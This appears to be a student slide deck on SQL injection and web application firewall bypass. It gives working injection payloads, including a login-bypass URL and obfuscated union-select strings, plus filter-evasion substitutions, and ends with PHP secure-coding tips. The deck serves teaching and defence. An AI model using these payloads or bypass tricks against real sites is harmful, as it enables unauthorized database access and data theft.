All Ab0ut 0f SQL Injection and WAF Bypass Techniques

1. All Ab0ut 0f SQL Injection and WAF Bypass Techniques ThatsanaiDetdamrongpreeecha Computer science @ King Mongkut's Institute of Technology Ladkrabang

2. What is SQL Injection ? • Sql injection is code injection • Happened when user Inject sql command for change condition • because develop not filtered input from user

3. Logical Conjunction and Disjunction table

4. SQL Operator • And , && • Or , || • Like • * • ( , ) • < , > • +, - , *, /, %

5. SQL Comment end of the line • "#" • "--" • "-- " multiple line • /* */

6. Examples vulnerability and inject command

7. sql command : SELECT first_name, last_name FROM users WHERE user_id = '$id‘ Inject code : SELECT first_name, last_name FROM users WHERE user_id = '1‘ or ‘1’ SELECT first_name, last_name FROM users WHERE user_id = 'am’ or ‘am’ SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or ‘1’=‘1’ SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or ‘2600’=‘2600’ SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or ‘HELLO’ or ‘HELLO’ SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or 1 #’ SELECT first_name, last_name FROM users WHERE user_id = ' ‘ or true #’

8. sql command : SELECT first_name, last_name FROM users WHERE user_id = $id Inject code : true ‘1’ or ‘1’ 2 or 2 sql command : SELECT first_name, last_name FROM users WHERE user_id = ($id) Inject code : 1) or (1 2+3) or (5

9. http://cs.ssru.ac.th/cs01/mae/Pae/ตัวอย่างและโปรแกรมที่โหลดๆมา/Login_thaicreate/PHP MySQL กับ Login Form ทำระบบ User ล็อกอิน แบบง่าย ๆ ด้วย PHP และ MySQL โดยทำการตรวจสอบ Username และ Password.htm

10. http://www.santosh143.com/2013/05/how-to-create-loginregister-system.htmlhttp://www.santosh143.com/2013/05/how-to-create-loginregister-system.html

11. http://www.exploit-db.com/exploits/26405/

12. http://www.exploit-db.com/exploits/26416/

13. Example • $sql = "SELECT * FROM members WHERE password='".md5($_GET['password'])."' AND username='".$_GET['username']."'"; • $result = mysql_query($sql, $db); • if ($result === FALSE) • die('Invalid SQL query'); • if (mysql_num_rows($result) == 1) { • echo "Congrats, WIN!!!\n"; • } • else { • echo "The number of rows is not 1\n"; • } login_sqli1.php?password=whatever&username='+or+1=1+LIMIT+1#

14. Impact • Get Information in database • Can gaining access system • Etc.

15. Bypass Web Application Firewall Techniques

16. What is Web Application Firewall • Web application Firewall ( WAF ) • Software or Hardware • Emphasis in prevention on the website • Filters all data in application layer • Can detected and prevention website

17. How to Bypass? • Original • 1’ or ‘1’=‘1 • union all select 1,2,3,4,5 – • union all select 1,2,@@version,4,5 – • Solution • 1’ oR ‘1’=‘1 • uNIonAlLsELeCt 1,2,3,4,5 – • u/*2600*/ni/*12345*/on a/*..*/lL se/*AAAA*/lEct 1,2,@@VerSIon,4,5 --

18. How to Bypass?(cont.) • If Filter or , and • Solve : • Using || instead of or • Using && instead of and

19. How to Bypass?(cont.) • If Filter where • Solve : • Using limit instead of where • If Filter limit • Solve : • You can Using group by and havinginstead of where

20. How to Bypass?(cont.) • If Filter whitespace • Solve : • Using %0binstead of whitespace • If Filter ‘ • Solve : • Using 0xXX , unhex(xx)instead of ‘

21. How to Mitigation

22. Top 5 Secure Coding Tips for PHP applications • Filter Input Data • GET , POST , COOKIE • Securing Database Queries • Filter Output Data • htmlspecialchars() • htmlentities() • strip_tags() • strtr() • Error Handling • log_errors = On • display_errors = Off • Preventing other injection attacks

23. References and Appendix • www.owasp.org • http://palpapers.plynt.com/issues/2009Dec/secure-coding-php/ • http://dev.mysql.com/doc/refman/5.0/en/non-typed-operators.html • http://thtutz.blogspot.com